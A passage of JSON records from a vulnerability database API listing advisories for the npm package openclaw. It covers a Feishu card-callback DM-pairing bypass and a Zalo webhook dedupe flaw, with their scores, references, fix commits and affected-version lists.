"vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35668", "GHSA-hr5v-j9h9-xjhg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d3qp-5wm9-aqfp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90876?format=api", "vulnerability_id": "VCID-d864-qy75-c3dx", "summary": "OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n## Summary\n\nFeishu Raw card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`.\n\n## Fix Commit(s)\n\n- `81c45976db532324b5a0918a70decc19520dc354`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35664", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.27048", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.27001", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00098", "scoring_system": "epss", "scoring_elements": "0.2704", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35664" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35664", "reference_id": "CVE-2026-35664", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35664" }, { "reference_url": "https://github.com/advisories/GHSA-77w2-crqv-cmv3", "reference_id": "GHSA-77w2-crqv-cmv3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-77w2-crqv-cmv3" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks", "reference_id": "openclaw-dm-pairing-bypass-via-legacy-card-callbacks", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35664", "GHSA-77w2-crqv-cmv3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d864-qy75-c3dx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89306?format=api", "vulnerability_id": "VCID-d8v2-gft5-buee", "summary": "OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates.\n\n## Impact\n\nCross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @D0ub1e-D for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41354", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.1772", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17683", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17714", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41354" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41354", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41354" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys" }, { "reference_url": "https://github.com/advisories/GHSA-rxmx-g7hr-8mx4", "reference_id": "GHSA-rxmx-g7hr-8mx4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rxmx-g7hr-8mx4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": 